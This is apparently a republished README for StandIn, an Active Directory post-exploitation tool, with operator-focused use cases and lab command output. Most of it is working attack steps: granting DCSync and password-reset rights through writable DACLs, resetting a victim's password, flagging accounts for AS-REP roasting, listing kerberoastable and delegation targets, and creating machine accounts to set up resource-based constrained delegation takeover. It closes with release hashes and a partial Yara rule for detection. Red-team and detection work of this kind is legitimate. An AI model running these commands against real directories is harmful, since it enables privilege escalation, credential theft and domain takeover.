|_ top \n |_ person \n |_ organizationalPerson \n |_ user \n |_ computer \n [+] badpwdcount \n |_ 0 \n [+] samaccounttype \n |_ SAM_MACHINE_ACCOUNT \n [+] lastlogontimestamp \n |_ 11/1/2020 7:40:09 PM UTC \n [+] usncreated \n |_ 31103 \n [+] objectguid \n |_ 17c80232-2ee6-47e1-9ab5-22c51c268cf0 \n [+] localpolicyflags \n |_ 0 \n [+] whencreated \n |_ 7/9/2020 4:59:55 PM \n [+] adspath \n |_ LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local \n [+] useraccountcontrol \n |_ WORKSTATION_TRUST_ACCOUNT \n [+] cn \n |_ M-10-1909-01 \n [+] countrycode \n |_ 0 \n [+] primarygroupid \n |_ 515 \n [+] whenchanged \n |_ 11/2/2020 7:59:32 PM \n [+] operatingsystemversion \n |_ 10.0 (18363) \n [+] dnshostname \n |_ m-10-1909-01.main.redhook.local \n [+] dscorepropagationdata \n |_ 10/30/2020 6:56:30 PM \n |_ 10/25/2020 1:28:32 AM \n |_ 7/16/2020 2:15:26 PM \n |_ 7/15/2020 8:54:17 PM \n |_ 1/1/1601 12:04:17 AM \n [+] lastlogon \n |_ 11/3/2020 10:21:11 AM UTC \n [+] distinguishedname \n |_ CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local \n [+] msds-supportedencryptiontypes \n |_ RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 \n [+] samaccountname \n |_ M-10-1909-01$ \n [+] objectsid \n |_ S-1-5-21-1293271031-3053586410-2290657902-1126 \n [+] lastlogoff \n |_ 0 \n [+] accountexpires \n |_ 0x7FFFFFFFFFFFFFFF \n \n\n \n** Get object access permissions ** \n \n** Use Case ** \n\n\n> _ At certain stages of the engagement, the operator may want to resolve the access permissions for a specific object in AD. Many permissions can offer an operational avenue to expand access or achieve objectives. For instance, a WriteDacl permission on a group could allow the operator to grant him / her self permissions to add a new user to the group. Tools like [ SharpHound ](<https://github.com/BloodHoundAD/SharpHound3> \"SharpHound\" ) already, in many instances, reveal these Dacl weaknesses. _\n\n \n** Syntax ** \n\n\nRetrieve the [ active directory ](<https://www.kitploit.com/search/label/Active%20Directory> \"active directory\" ) rules that apply to the resolved object and translate any schema / rights GUID's to their friendly name. Optionally filter the results by an NTAccount name. \n \n \n C:\\>StandIn.exe --object samaccountname=m-10-1909-01$ --access \n \n [?] Using DC : m-w19-dc01.main.redhook.local \n [?] Object : CN=M-10-1909-01 \n Path : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local \n \n [+] Object properties \n |_ Owner : MAIN\\domainjoiner \n |_ Group : MAIN\\Domain Join \n \n [+] Object access rules \n \n [+] Identity --> NT AUTHORITY\\SELF \n |_ Type : Allow \n |_ Permission : CreateChild, DeleteChild \n |_ Object : ANY \n \n [+] Identity --> NT AUTHORITY\\Authenticated Users \n |_ Type : Allow \n |_ Permission : GenericRead \n |_ Object : ANY \n \n [... Snip ...] \n \n C:\\> StandIn.exe --object samaccountname=m-10-1909-01$ --access --ntaccount \"MAIN\\domainjoiner\" \n \n [?] Using DC : m-w19-dc01.main.redhook.local \n [?] Object : CN=M-10-1909-01 \n Path : LDAP://CN=M-10-1909-01,OU=Workstations,OU =OCCULT,DC=main,DC=redhook,DC=local \n \n [+] Object properties \n |_ Owner : MAIN\\domainjoiner \n |_ Group : MAIN\\Domain Join \n \n [+] Object access rules \n \n [+] Identity --> MAIN\\domainjoiner \n |_ Type : Allow \n |_ Permission : DeleteTree, ExtendedRight, Delete, GenericRead \n |_ Object : ANY \n \n [+] Identity --> MAIN\\domainjoiner \n |_ Type : Allow \n |_ Permission : WriteProperty \n |_ Object : User-Account-Restrictions \n \n [+] Identity --> MAIN\\domainjoiner \n |_ Type : Allow \n |_ Permission : Self \n |_ Object : servicePrincipalName \n \n [+] Identity --> MAIN\\domainjoiner \n |_ Type : Allow \n |_ Permission : Self \n |_ Object : dNSHostName \n \n [+] Identity --> MAIN\\domainjoiner \n |_ Type : Allow \n |_ Permission : WriteProperty \n |_ Object : sAMAccountName \n \n [+] Identity --> MAIN\\do mainjoiner \n |_ Type : Allow \n |_ Permission : WriteProperty \n |_ Object : displayName \n \n [+] Identity --> MAIN\\domainjoiner \n |_ Type : Allow \n |_ Permission : WriteProperty \n |_ Object : description \n \n [+] Identity --> MAIN\\domainjoiner \n |_ Type : Allow \n |_ Permission : WriteProperty \n |_ Object : User-Logon \n \n [+] Identity --> MAIN\\domainjoiner \n |_ Type : Allow \n |_ Permission : Self \n |_ Object : DS-Validated-Write-Computer \n \n\n \n** Grant object access permission ** \n \n** Use Case ** \n\n\n> _ With the appropriate rights, the operator can grant an NTAccount special permissions over a specific object in AD. For instance, if an operator has GenericAll privileges over a user account they can grant themselves or a 3rd party NTAccount permission to change the user\u2019s password without knowing the current password. _\n\n \n** Syntax ** \n\n\nAdd permission to the resolved object for a specified NTAccount. StandIn supports a small set of pre-defined privileges (GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync) but it also allows operators to specify a custom rights guid using the ` --guid ` flag. \n \n \n C:\\> whoami \n main\\s4uuser \n \n C:\\> StandIn.exe --group lowPrivButMachineAccess \n \n [?] Using DC : m-w19-dc01.main.redhook.local \n [?] Group : lowPrivButMachineAccess \n GUID : 37e3d957-af52-4cc6-8808-56330f8ec882 \n \n [+] Members \n \n [?] Path : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : s4uUser \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1197 \n \n C:\\> StandIn.exe --object \"distinguishedname=DC=main,DC=redhook,DC=local\" --access --ntaccount \"MAIN\\lowPrivButMachineAccess\" \n \n [?] Using DC : m-w19-dc01.main.redhook.local \n [?] Object : DC=main \n Path : LDAP://DC=main,DC=redhook,DC=local \n \n [+] Object properties \n |_ Owner : BUILTIN\\Administrators \n |_ Group : BUILTIN\\Administrators \n \n [+] Object access rules \n \n [+] Identity --> MAIN\\lowPrivButMachineAccess \n |_ Type : Allow \n |_ Permission : WriteDacl \n |_ Object : ANY \n \n C:\\> StandIn.exe --object \"distinguishedname=DC=main,DC=redhook,DC=local\" --grant \"MAIN\\s4uuser\" --type DCSync \n \n [?] Using DC : m-w19-dc01.main.redhook.local \n [?] Object : DC=main \n Path : LDAP://DC=main,DC=redhook,DC=local \n \n [+] Object properties \n |_ Owner : BUILTIN\\Administrators \n |_ Group : BUILTIN\\Administrators \n \n [+] Set object access rules \n |_ Success, added dcsync privileges to object for MAIN\\s4uuser \n \n C:\\> StandIn.exe --object \"distinguishedname=DC=main,DC=redhook,DC=local\" --access --ntaccount \"MAIN\\s4uUser\" \n \n [?] Using DC : m-w19-dc01.main.redhook.local \n [?] Object : DC=main \n Path : LDAP://DC=main,DC=redhook,DC=local \n \n [+] Object properties \n |_ Owner : BUILTIN\\Administrators \n |_ Group : BUILTIN\\Administrators \n \n [+] Object access rules \n \n [+] Identity --&g t; MAIN\\s4uUser \n |_ Type : Allow \n |_ Permission : ExtendedRight \n |_ Object : DS-Replication-Get-Changes-All \n \n [+] Identity --> MAIN\\s4uUser \n |_ Type : Allow \n |_ Permission : ExtendedRight \n |_ Object : DS-Replication-Get-Changes \n \n [+] Identity --> MAIN\\s4uUser \n |_ Type : Allow \n |_ Permission : ExtendedRight \n |_ Object : DS-Replication-Get-Changes-In-Filtered-Set \n \n\n \n** Set object password ** \n \n** Use Case ** \n\n\n> _ If the operator has ` User-Force-Change-Password ` permissions over a user object they can change the password for that user account without knowing the current password. This action is destructive as the user will no longer be able to authenticate which may raise alarm bells. _\n\n \n** Syntax ** \n\n\nSet the resolved object's password without knowing the current password. \n \n \n C:\\> whoami \n main\\s4uuser \n \n C:\\> StandIn.exe --object \"samaccountname=user005\" --access --ntaccount \"MAIN\\lowPrivButMachineAccess\" \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Object : CN=User 005 \n Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n \n [+] Object properties \n |_ Owner : MAIN\\Domain Admins \n |_ Group : MAIN\\Domain Admins \n \n [+] Object access rules \n \n [+] Identity --> MAIN\\lowPrivButMachineAccess \n |_ Type : Allow \n |_ Permission : WriteDacl \n |_ Object : ANY \n \n C:\\> StandIn.exe --object \"samaccountname=user005\" --grant \"MAIN\\s4uuser\" --type resetpassword \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Object : CN=User 005 \n Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n \n [+] Object properties \n |_ Owner : MAIN\\Domain Admins \n |_ Group : MAIN\\Domain Adm ins \n \n [+] Set object access rules \n |_ Success, added resetpassword privileges to object for MAIN\\s4uuser \n \n C:\\> StandIn.exe --object \"samaccountname=user005\" --access --ntaccount \"MAIN\\s4uUser\" \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Object : CN=User 005 \n Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n \n [+] Object properties \n |_ Owner : MAIN\\Domain Admins \n |_ Group : MAIN\\Domain Admins \n \n [+] Object access rules \n \n [+] Identity --> MAIN\\s4uUser \n |_ Type : Allow \n |_ Permission : ExtendedRight \n |_ Object : User-Force-Change-Password \n \n C:\\> StandIn.exe --object \"samaccountname=user005\" --newpass \"Arkh4mW1tch!\" \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Object : CN=User 005 \n Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n \n [+] Object properties \n |_ Owner : MAIN\\Domain Admins \n |_ Group : MAIN\\Domain Admins \n \n [+] Setting account password \n |_ Success, password set for object \n \n\n \n** Add/Remove ASREP from object flags ** \n \n** Use Case ** \n\n\n> _ If the operator has write access to a user account, they can modify the user\u2019s ` userAccountControl ` flags to include ` DONT_REQUIRE_PREAUTH ` . Doing so allows the operator to request an AS-REP hash for the user which can be cracked offline. This process is very similar to kerberoasting. This action is not destructive, but it relies on the fact that the user has a password which can be cracked in a reasonable timeframe. _\n\n \n** Syntax ** \n\n\nAdd and remove ` DONT_REQUIRE_PREAUTH ` from the resolved object's ` userAccountControl ` flags. \n \n \n C:\\> StandIn.exe --object \"samaccountname=user005\" --asrep \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Object : CN=User 005 \n Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n \n [*] SamAccountName : user005 \n DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD \n \n [+] Updating userAccountControl.. \n |_ Success \n \n C:\\> StandIn.exe --asrep \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n \n [?] Found 1 object(s) that do not require Kerberos preauthentication.. \n \n [*] SamAccountName : user005 \n DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH \n \n C:\\> StandIn.exe --object \"samaccountname=user005\" --asrep --rem ove \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Object : CN=User 005 \n Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n \n [*] SamAccountName : user005 \n DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH \n \n [+] Updating userAccountControl.. \n |_ Success \n \n C:\\> StandIn.exe --asrep \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n \n [?] Found 0 object(s) that do not require Kerberos preauthentication.. \n \n\n \n** ASREP ** \n \n** Use Case ** \n\n\n> _ This function enumerates all accounts in AD which are currently enabled and have ` DONT_REQUIRE_PREAUTH ` as part of their ` userAccountControl ` flags. These accounts can be AS-REP roasted, this process is very similar to kerberoasting. _\n\n \n** Syntax ** \n\n\nReturn all accounts that are ASREP roastable. \n \n \n C:\\> StandIn.exe --asrep \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n \n [?] Found 1 object(s) that do not require Kerberos preauthentication.. \n \n [*] SamAccountName : user005 \n DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH \n \n\n \n** SPN ** \n \n** Use Case ** \n\n\n> _ This function enumerates all accounts in AD which are currently enabled and can be kerberoasted. Some basic account information is added for context: when was the password last set, when was the account last used and what [ encryption ](<https://www.kitploit.com/search/label/Encryption> \"encryption\" ) types are supported. _\n\n \n** Syntax ** \n\n\nReturn all accounts that are kerberoastable. \n \n \n C:\\> StandIn.exe --spn \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Found 1 kerberostable users.. \n \n [*] SamAccountName : SimCritical \n DistinguishedName : CN=SimCritical,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n ServicePrincipalName : ldap/M-2012R2-03.main.redhook.local \n PwdLastSet : 11/2/2020 7:06:17 PM UTC \n lastlogon : 0x0 \n Supported ETypes : RC4_HMAC_DEFAULT \n \n\n \n** Unconstrained / constrained / resource-based constrained delegation ** \n \n** Use Case ** \n\n\n> _ This function enumerates all accounts that are permitted to perform [ unconstrained ](<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation> \"unconstrained\" ) , [ constrained ](<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation> \"constrained\" ) , or [ resource-based constrained ](<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution> \"resource-based constrained\" ) delegation. These assets can be used to expand access or achieve objectives. _\n\n \n** Syntax ** \n\n\nReturn all accounts that have either unconstrained or constrained delegation permissions, or have inbound resource-based constrained delegation privileges. \n \n \n C:\\> StandIn.exe --delegation \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n \n [?] Found 3 object(s) with unconstrained delegation.. \n \n [*] SamAccountName : M-2019-03$ \n DistinguishedName : CN=M-2019-03,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local \n userAccountControl : WORKSTATION_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION \n \n [*] SamAccountName : M-W16-DC01$ \n DistinguishedName : CN=M-W16-DC01,OU=Domain Controllers,DC=main,DC=redhook,DC=local \n userAccountControl : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION \n \n [*] SamAccountName : M-W19-DC01$ \n DistinguishedName : CN=M-W19-DC01,OU=Domain Controllers,DC=main,DC=redhook,DC=local \n userAccountControl : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION \n \n [?] Found 2 object(s) with constrained delegation.. \n \n [*] SamAccountName : M-2019-04$ \n DistinguishedName : CN=M-2019-04,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local \n msDS-AllowedToDelegateTo : HOST/m-w16-dc01.main.redhook.local/main.redhook.local \n HOST/m-w16-dc01.main.redhook.local \n HOST/M-W16-DC01 \n HOST/m-w16-dc01.main.redhook.local/MAIN \n HOST/M-W16-DC01/MAIN \n Protocol Transition : False \n userAccountControl : WORKSTATION_TRUST_ACCOUNT \n \n [*] SamAccountName : M-2019-05$ \n DistinguishedName : CN=M-2019-05,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local \n msDS-AllowedToDelegateTo : cifs/m-2012r2-03.main.redhook.local \n cifs/M-2012R2-03 \n Protocol Transition : True \n userAccountControl : WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION \n \n [?] Found 1 object(s) with resource-based constrained delegation.. \n \n [*] SamAccountName : M-10-1909-01$ \n DistinguishedName : CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local \n Inbound Delegation : Server Admins [GROUP] \n userAccountControl : WORKSTATION_TRUST_ACCOUNT \n \n\n \n** DC's ** \n \n** Use Case ** \n\n\n> _ This function provides situational awareness by finding all domain controllers and listing some of their properties including their role assignments. _\n\n \n** Syntax ** \n\n\nGet all domain controllers. \n \n \n C:\\> StandIn.exe --dc \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n |_ Domain : main.redhook.local \n \n [*] Host : m-w16-dc01.main.redhook.local \n Domain : main.redhook.local \n Forest : main.redhook.local \n SiteName : Default-First-Site-Name \n IP : 10.42.54.5 \n OSVersion : Windows Server 2016 Datacenter \n Local System Time UTC : Tuesday, 03 November 2020 03:29:17 \n Role : SchemaRole \n NamingRole \n PdcRole \n RidRole \n InfrastructureRole \n \n [*] Host : m-w19-dc01.main.redhook.local \n Domain : main.redhook.local \n Forest : main.redhook.local \n SiteName : Default-First-Site-Name \n IP : 10.42.54.13 \n OSVersion : Windows Server 2019 Datacenter \n Local System Time UTC : Tuesday, 03 November 2020 03:29:17 \n \n\n \n** Groups Operations ** \n\n\nThese functions deal specificaly with domain groups. \n\n \n** List group membership ** \n \n** Use Case ** \n\n\n> _ This function provides situational awareness, listing all members of a domain group including their type (user or nested group). _\n\n \n** Syntax ** \n\n\nEnumerate group membership and provide rudementary details for the member objects. \n \n \n C:\\> StandIn.exe --group \"Server Admins\" \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Group : Server Admins \n GUID : 92af8954-58cc-4fa4-a9ba-69bfa5524b5c \n \n [+] Members \n \n [?] Path : LDAP://CN=Workstation Admins,OU=Groups,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : Workstation Admins \n Type : Group \n SID : S-1-5-21-1293271031-3053586410-2290657902-1108 \n \n [?] Path : LDAP://CN=Server Admin 001,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : srvadmin001 \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1111 \n \n [?] Path : LDAP://CN=Server Admin 002,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : srvadmin002 \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1184 \n \n [?] Path : LDAP://CN =Server Admin 003,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : srvadmin003 \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1185 \n \n [?] Path : LDAP://CN=Server Admin 004,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : srvadmin004 \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1186 \n \n [?] Path : LDAP://CN=Server Admin 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : srvadmin005 \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1187 \n \n [?] Path : LDAP://CN=SimCritical,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : SimCritical \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1204 \n \n\n \n** Add user to group ** \n \n** Use Case ** \n\n\n> _ With appropriate access the operator can add an NTAccount to a domain group. _\n\n \n** Syntax ** \n\n\nAdd an NTAccount [ identifier ](<https://www.kitploit.com/search/label/Identifier> \"identifier\" ) to a domain group. Normally this would be a user but it could also be a group. \n \n \n C:\\> StandIn.exe --group lowprivbutmachineaccess \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Group : lowPrivButMachineAccess \n GUID : 37e3d957-af52-4cc6-8808-56330f8ec882 \n \n [+] Members \n \n [?] Path : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : s4uUser \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1197 \n \n C:\\> StandIn.exe --group lowprivbutmachineaccess --ntaccount \"MAIN\\user001\" \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Group : lowPrivButMachineAccess \n GUID : 37e3d957-af52-4cc6-8808-56330f8ec882 \n \n [+] Adding user to group \n |_ Success \n \n C:\\> StandIn.exe --group lowprivbutmachineaccess \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Group : lowPrivButMachineAccess \n GUID : 37e3d957-af52-4cc6-8808-56330f8ec882 \n \n [+] Members \n \n [?] Path : LDAP://CN=User 001,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : user001 \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1106 \n \n [?] Path : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local \n samAccountName : s4uUser \n Type : User \n SID : S-1-5-21-1293271031-3053586410-2290657902-1197 \n \n\n \n** Machine Object Operations ** \n\n\nThese functions specifically are for machine operations and expect the machine name as an input. \n\n \n** Create machine object ** \n \n** Use Case ** \n\n\n> _ The operator may wish to create a machine object in order to perform a [ resource based constrained delegation ](<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution> \"resource based constrained delegation\" ) attack. By default any domain user has the ability to create up to 10 machines on the local domain. _\n\n \n** Syntax ** \n\n\nCreate a new machine object with a random password, user ` ms-DS-MachineAccountQuota ` applies to this operation. \n \n \n C:\\> StandIn.exe --computer M-1337-b33f --make \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n |_ Domain : main.redhook.local \n |_ DN : CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local \n |_ Password : MlCGkaacS5SRUOt \n \n [+] Machine account added to AD.. \n \n\nThe ` ms-DS-MachineAccountQuota ` property exists in the domain root object. If you need to verify the quota you can perform an object search as shown below. \n \n \n C:\\> StandIn.exe --object ms-DS-MachineAccountQuota=* \n \n\n \n** Disable machine object ** \n \n** Use Case ** \n\n\n> _ Standard users do not have the ability to delete a machine object, however a user that create a machine can thereafter disable the machine object. _\n\n \n** Syntax ** \n\n\nDisable a machine that was previously created. This action should be performed in the context of the same user that created the machine. Note that non-elevated users can't delete machine objects only disable them. \n \n \n C:\\> StandIn.exe --computer M-1337-b33f --disable \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Object : CN=M-1337-b33f \n Path : LDAP://CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local \n \n [+] Machine account currently enabled \n |_ Account disabled.. \n \n\n \n** Delete machine object ** \n \n** Use Case ** \n\n\n> _ With elevated AD privileges the operator can delete a machine object, such as once create earlier in the attack chain. _\n\n \n** Syntax ** \n\n\nUse an elevated context to delete a machine object. \n \n \n C:\\> StandIn.exe --computer M-1337-b33f --delete \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Object : CN=M-1337-b33f \n Path : LDAP://CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local \n \n [+] Machine account deleted from AD \n \n\n \n** Add msDS-AllowedToActOnBehalfOfOtherIdentity ** \n \n** Use Case ** \n\n\n> _ With write access to a machine object this function allows the operator to add an ` msDS-AllowedToActOnBehalfOfOtherIdentity ` property to the machine which is required to perform a [ resource based constrained delegation ](<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution> \"resource based constrained delegation\" ) attack. _\n\n \n** Syntax ** \n\n\nAdd an ` msDS-AllowedToActOnBehalfOfOtherIdentity ` propert to the machine along with a SID to facilitate host takeover using resource based constrained delegation. \n \n \n C:\\> StandIn.exe --computer m-10-1909-03 --sid S-1-5-21-1293271031-3053586410-2290657902-1205 \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Object : CN=M-10-1909-03 \n Path : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local \n [+] SID added to msDS-AllowedToActOnBehalfOfOtherIdentity \n \n C:\\> StandIn.exe --object samaccountname=m-10-1909-03$ \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Object : CN=M-10-1909-03 \n Path : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local \n \n [?] Iterating object properties \n \n [+] logoncount \n |_ 107 \n [+] codepage \n |_ 0 \n [+] objectcategory \n |_ CN=Computer,CN=Schema,CN=Configuration,DC=main,DC=redhook,DC=local \n [+] iscriticalsystemobject \n |_ False \n [+] operatingsystem \n |_ Windows 10 Enterprise \n [+] usnchanged \n |_ 195771 \n [+] instancetype \n |_ 4 \n [+] name \n |_ M-10-1909-03 \n [+] badpasswordtime \n |_ 7/9/2020 5:07:11 PM UTC \n [+] pwdlastset \n |_ 10/29/2020 6:44:08 PM UTC \n [+] serviceprincipalname \n |_ TERMSRV/M-10-1909-03 \n |_ TERMSRV/m-10-1909-03.main.redhook.local \n |_ WSMAN/m-10-1909-03 \n |_ WSMAN/m-10-1909-03.main.redhook.local \n |_ RestrictedKrbHost/M-10-1909-03 \n |_ HOST/M-10-1909-03 \n |_ RestrictedKrbHost/m-10-1909-03.main.redhook.local \n |_ HOST/m-10-1909-03.main.redhook.local \n [+] objectclass \n |_ top \n |_ person \n |_ organizationalPerson \n |_ user \n |_ computer \n [+] badpwdcount \n |_ 0 \n [+] samaccounttype \n |_ SAM_MACHINE_ACCOUNT \n [+] lastlogontimestamp \n |_ 10/29/2020 12:29:26 PM UTC \n [+] usncreated \n |_ 31127 \n [+] objectguid \n |_ c02cff97-4bfd-457c-a568-a748b0725c2f \n [+] localpolicyflags \n |_ 0 \n [+] whencreated \n |_ 7/9/2020 5:05:08 PM \n [+] adspa th \n |_ LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local \n [+] useraccountcontrol \n |_ WORKSTATION_TRUST_ACCOUNT \n [+] cn \n |_ M-10-1909-03 \n [+] countrycode \n |_ 0 \n [+] primarygroupid \n |_ 515 \n [+] whenchanged \n |_ 11/2/2020 7:55:14 PM \n [+] operatingsystemversion \n |_ 10.0 (18363) \n [+] dnshostname \n |_ m-10-1909-03.main.redhook.local \n [+] dscorepropagationdata \n |_ 10/30/2020 6:56:30 PM \n |_ 10/30/2020 10:55:22 AM \n |_ 10/29/2020 4:58:51 PM \n |_ 10/29/2020 4:58:29 PM \n |_ 1/1/1601 12:00:01 AM \n [+] lastlogon \n |_ 11/2/2020 9:07:20 AM UTC \n [+] distinguishedname \n |_ CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local \n [+] msds-supportedencryptiontypes \n |_ RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 \n [+] samaccountname \n |_ M-10-1909-03$ \n [+] objectsid \n |_ S-1-5-21-1293271031-30535 86410-2290657902-1127 \n [+] lastlogoff \n |_ 0 \n [+] msds-allowedtoactonbehalfofotheridentity \n |_ BinLen : 36 \n |_ AceQualifier : AccessAllowed \n |_ IsCallback : False \n |_ OpaqueLength : 0 \n |_ AccessMask : 983551 \n |_ SID : S-1-5-21-1293271031-3053586410-2290657902-1205 \n |_ AceType : AccessAllowed \n |_ AceFlags : None \n |_ IsInherited : False \n |_ InheritanceFlags : None \n |_ PropagationFlags : None \n |_ AuditFlags : None \n [+] accountexpires \n |_ 0x7FFFFFFFFFFFFFFF \n \n\n \n** Remove msDS-AllowedToActOnBehalfOfOtherIdentity ** \n \n** Use Case ** \n\n\n> _ With write access to a machine object this function allows the operator to remove a previously added ` msDS-AllowedToActOnBehalfOfOtherIdentity ` property from the machine. _\n\n \n** Syntax ** \n\n\nRemove previously created ` msDS-AllowedToActOnBehalfOfOtherIdentity ` property from a machine. \n \n \n C:\\> StandIn.exe --computer m-10-1909-03 --remove \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Object : CN=M-10-1909-03 \n Path : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local \n [+] msDS-AllowedToActOnBehalfOfOtherIdentity property removed.. \n \n\n \n** Detection ** \n\n\nThis outlines a number of IOC's which can aid in the [ detection engineering ](<https://www.kitploit.com/search/label/Detection%20Engineering> \"detection engineering\" ) process for StandIn. \n\n \n** Release Package Hashes ** \n\n\nThe following table maps the release package hashes for StandIn. \n \n \n -=v0.8=- \n StandIn_Net35.exe SHA256: A0B3C96CA89770ED04E37D43188427E0016B42B03C0102216C5F6A785B942BD3 \n MD5: 8C942EE4553E40A7968FF0C8DC5DB9AB \n \n StandIn_Net45.exe SHA256: F80AEB33FC53F2C8D6313A6B20CD117739A71382C208702B43073D54C9ACA681 \n MD5: 9E0FC3159A6BF8C3A8A0FAA76F6F74F9 \n \n -=v0.7=- \n StandIn_Net35.exe SHA256: A1ECD50DA8AAE5734A5F5C4A6A951B5F3C99CC4FB939AC60EF5EE19896CA23A0 \n MD5: 50D29F7597BF83D80418DEEFD360F093 \n \n StandIn_Net45.exe SHA256: DBAB7B9CC694FC37354E3A18F9418586172ED6660D8D205EAFFF945525A6A31A \n MD5: 4E5258A876ABCD2CA2EF80E0D5D93195 \n \n\n \n** Yara ** \n\n\nThe following Yara rules can be used to detect StandIn on disk, in it's default form. \n \n \n rule StandIn \n { \n meta: \n author = \"Ruben Boonen (@FuzzySec)\" \n description = \"Detect StandIn string constants.\" \n \n strings: \n $s1 = \"StandIn\" ascii wide nocase \n $s2 = 